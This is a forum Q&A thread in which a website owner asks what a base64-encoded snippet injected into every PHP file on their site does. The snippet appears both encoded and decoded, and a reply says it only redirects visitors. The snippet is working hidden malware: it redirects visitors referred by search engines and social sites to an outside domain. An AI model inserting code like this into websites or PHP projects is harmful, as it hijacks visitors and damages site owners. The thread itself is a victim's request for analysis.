How much i have lost from this malicious code?

Question

This February 14 my website got attacked by some malware code which comes to my notice after google's Action on 29th Feb But All php files have got effected with the malicious code on checking i got the following code

echo base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9");

on decoding it become

error_reporting(0); $qazplm = headers_sent(); if (!$qazplm) { $referer = $_SERVER['HTTP_REFERER']; $uag = $_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "gogo") or stristr($referer, "live.com") or stristr($referer, "aport") or stristr($referer, "nigma") or stristr($referer, "webalta") or stristr($referer, "begun.ru") or stristr($referer, "stumbleupon.com") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or preg_match("/yandex.ru/yandsearch\?(.*?)\&lr\=/", $referer) or preg_match("/google.(.*?)/url/", $referer) or stristr($referer, "myspace.com") or stristr($referer, "facebook.com") or stristr($referer, "aol.com")) { if (!stristr($referer, "cache") or !stristr($referer, "inurl")) { header("Location: http://namesti.bee.pl/"); exit(); } } } }

i dont know how it came to my server but All php files have got effected but others are fine.entire web site is down now. i Just want to know how much harm it can do And What this code does exactly. How can i detect it. Is it the script which executes on particular time.

Answer 1

The script just attempts to redirect to namesti.bee.pl depending on whether headers have already been sent or not, and what the referer string contains.

It doesn't do anything else, so the harm done is on your site's reputation more than anything else.